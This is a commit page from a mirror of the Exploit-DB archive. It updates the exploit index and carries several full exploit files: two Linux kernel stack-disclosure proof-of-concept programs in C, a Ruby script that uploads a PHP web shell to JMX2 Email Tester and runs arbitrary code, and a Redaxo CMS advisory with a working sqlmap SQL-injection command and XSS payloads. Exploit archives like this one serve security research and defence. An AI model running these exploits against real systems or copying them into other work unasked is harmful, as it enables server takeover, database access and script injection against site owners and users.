bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-18

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2016-02-18 05:01:30 +00:00
parent cc8580757a
commit 207c9bac9b
5 changed files with 391 additions and 274 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80

Can't render this file because it is too large.

242
platforms/linux/local/9352.c
View file

@ -1,121 +1,121 @@
/*
* sigaltstack-leak.c
*
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
*
* Ulrich Drepper correctly points out that there is generally padding in
* the structure on 64-bit hosts, and that copying the structure from
* kernel to user space can leak information from the kernel stack in those
* padding bytes.
*
* Notes:
*
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
* between stack_t's ss_flags and ss_size. The disclosure only affects
* affects 64-bit hosts.
*/
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>
const int randcalls[] = {
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};
void
dump(const unsigned char *p, unsigned l)
{
printf("stack_t:");
while (l > 0) {
printf(" ");
if (l == 12) {
printf("*** ");
}
printf("%02x", *p);
if (l == 9) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}
int
main(void)
{
char *p;
int call, ret;
size_t size, ftest, stest;
stack_t oss;
size = sizeof(stack_t);
printf("[+] Checking platform...\n");
if (size == 24) {
printf("[+] sizeof(stack_t) = %zu\n", size);
printf("[+] Correct size, 64-bit platform.\n");
} else {
printf("[-] sizeof(stack_t) = %zu\n", size);
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
printf("[-] No information disclosure is possible.\n");
exit(1);
}
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
stest = offsetof(stack_t, ss_size);
printf("[+] Checking for stack_t hole...\n");
if (ftest != stest) {
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
printf("[+] Hole in stack_t present!\n", ftest, stest);
} else {
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
exit(1);
}
printf("[+] Ready to call sigaltstack.\n\n");
for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));
while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);
ret = sigaltstack(NULL, &oss);
if (ret != 0) {
printf("[-] Error: sigaltstack failed.\n");
exit(1);
}
dump((unsigned char *) &oss, sizeof(oss));
}
return 0;
}
// milw0rm.com [2009-08-04]
/*
* sigaltstack-leak.c
*
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
*
* Ulrich Drepper correctly points out that there is generally padding in
* the structure on 64-bit hosts, and that copying the structure from
* kernel to user space can leak information from the kernel stack in those
* padding bytes.
*
* Notes:
*
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
* between stack_t's ss_flags and ss_size. The disclosure only affects
* affects 64-bit hosts.
*/
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>
const int randcalls[] = {
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};
void
dump(const unsigned char *p, unsigned l)
{
printf("stack_t:");
while (l > 0) {
printf(" ");
if (l == 12) {
printf("*** ");
}
printf("%02x", *p);
if (l == 9) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}
int
main(void)
{
char *p;
int call, ret;
size_t size, ftest, stest;
stack_t oss;
size = sizeof(stack_t);
printf("[+] Checking platform...\n");
if (size == 24) {
printf("[+] sizeof(stack_t) = %zu\n", size);
printf("[+] Correct size, 64-bit platform.\n");
} else {
printf("[-] sizeof(stack_t) = %zu\n", size);
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
printf("[-] No information disclosure is possible.\n");
exit(1);
}
ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
stest = offsetof(stack_t, ss_size);
printf("[+] Checking for stack_t hole...\n");
if (ftest != stest) {
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
printf("[+] Hole in stack_t present!\n", ftest, stest);
} else {
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
exit(1);
}
printf("[+] Ready to call sigaltstack.\n\n");
for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));
while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);
ret = sigaltstack(NULL, &oss);
if (ret != 0) {
printf("[-] Error: sigaltstack failed.\n");
exit(1);
}
dump((unsigned char *) &oss, sizeof(oss));
}
return 0;
}
// milw0rm.com [2009-08-04]

292
platforms/linux/local/9513.c
View file

@ -1,146 +1,146 @@
/*
* llc-getsockname-leak.c
*
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
*
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
* before copying to the above layer's structure.
*
* Notes:
*
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>
#ifndef AF_LLC
#define AF_LLC 26
#endif
#ifndef AF_LLC
#define AF_LLC 26
#endif
#ifndef LLC_SAP_NULL
#define LLC_SAP_NULL 0x00
#endif
#ifndef __LLC_SOCK_SIZE__
#define __LLC_SOCK_SIZE__ 16
struct sockaddr_llc {
sa_family_t sllc_family;
sa_family_t sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
sizeof(unsigned char) * 4 - 6];
};
#endif
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_llc:");
while (l > 0) {
printf(" ");
if (l == 12 || l == 2) {
printf("*** ");
}
printf("%02x", *p);
if (l == 10 || l == 1) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}
int
main(void)
{
struct sockaddr_llc sllc;
int ret, sock, call, sllc_len = sizeof(sllc);
printf("[+] Creating AF_LLC socket.\n");
sock = socket(AF_LLC, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_LLC socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
memset(&sllc, 0, sllc_len);
sllc.sllc_family = AF_LLC;
sllc.sllc_arphrd = ARPHRD_ETHER;
sllc.sllc_sap = LLC_SAP_NULL;
printf("[+] Dummy sendto to autobind socket.\n");
ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
if (ret == -1) {
printf("[-] Error: sendto failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
printf("[+] Ready to call getsockname.\n\n");
for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));
while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);
ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
dump((unsigned char *) &sllc, sizeof(sllc));
}
return 0;
}
// milw0rm.com [2009-08-25]
/*
* llc-getsockname-leak.c
*
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
*
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
* before copying to the above layer's structure.
*
* Notes:
*
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>
#ifndef AF_LLC
#define AF_LLC 26
#endif
#ifndef AF_LLC
#define AF_LLC 26
#endif
#ifndef LLC_SAP_NULL
#define LLC_SAP_NULL 0x00
#endif
#ifndef __LLC_SOCK_SIZE__
#define __LLC_SOCK_SIZE__ 16
struct sockaddr_llc {
sa_family_t sllc_family;
sa_family_t sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
sizeof(unsigned char) * 4 - 6];
};
#endif
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_llc:");
while (l > 0) {
printf(" ");
if (l == 12 || l == 2) {
printf("*** ");
}
printf("%02x", *p);
if (l == 10 || l == 1) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}
int
main(void)
{
struct sockaddr_llc sllc;
int ret, sock, call, sllc_len = sizeof(sllc);
printf("[+] Creating AF_LLC socket.\n");
sock = socket(AF_LLC, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_LLC socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
memset(&sllc, 0, sllc_len);
sllc.sllc_family = AF_LLC;
sllc.sllc_arphrd = ARPHRD_ETHER;
sllc.sllc_sap = LLC_SAP_NULL;
printf("[+] Dummy sendto to autobind socket.\n");
ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
if (ret == -1) {
printf("[-] Error: sendto failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
printf("[+] Ready to call getsockname.\n\n");
for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));
while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);
ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
dump((unsigned char *) &sllc, sizeof(sllc));
}
return 0;
}
// milw0rm.com [2009-08-25]

45
platforms/multiple/webapps/39456.rb Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none
require "net/http"
require "uri"
require 'uri-handler'
if ARGV.length != 2
puts "JMX2 Email Tester Web Shell Uploader"
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
puts " phpCode(ex): echo 'zzzzz'"
puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
puts " Install GEM: #> gem install uri-handler"
puts " exploit & code by hahwul[www.hahwul.com]"
else
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1] # PHP Code
shell = shell.to_uri
exp_url = target_url + "/models/save_email.php"
puts shell
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
puts exp_url
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept-Encoding"] = "gzip, deflate"
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
request["Connection"] = "keep-alive"
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
response = http.request(request)
puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end

70
platforms/php/webapps/39459.txt Executable file
View file

@ -0,0 +1,70 @@
=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
Redaxo CMS contains multiple vulnerabilities
-------------------------------------------------------------
Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: https://www.redaxo.org/
Tested version: Redaxo CMS v5.0.0
Credits: LSE Leading Security Experts GmbH employee Tim Herres
Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
Advisory Status: Public
CVE-Number: na
Impact
======
Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
resulting in a Cross Site Scripting vulnerability.
Issue Description
=================
The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
1) SQL Injection in the "Mediapool" component:
Authentication required: yes
User needs access to the "Mediapool".
POC:
Exploitation using SQL Map
sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
Parameter: media_name (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
2) Reflected XSS
Authentication required: yes
Used browser: FF42
Example:
https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=
3) Stored XSS (persistent XSS)
Authentication required: yes
Used browser: FF42
It is possible to store JavaScript Code in input fields.
Example:
Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
Payload:<script>alert("xss")</script>
Response:
[...]
[...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
[...]
Temporary Workaround and Fix
============================
Update to Version 5.0.1
History
=======
2016-01-18 Issues discovered
2016-01-29 Vendor contacted
2016-02-05 Vendor confirmed
2016-02-09 Vendor released patch
2016-02-16 Advisory released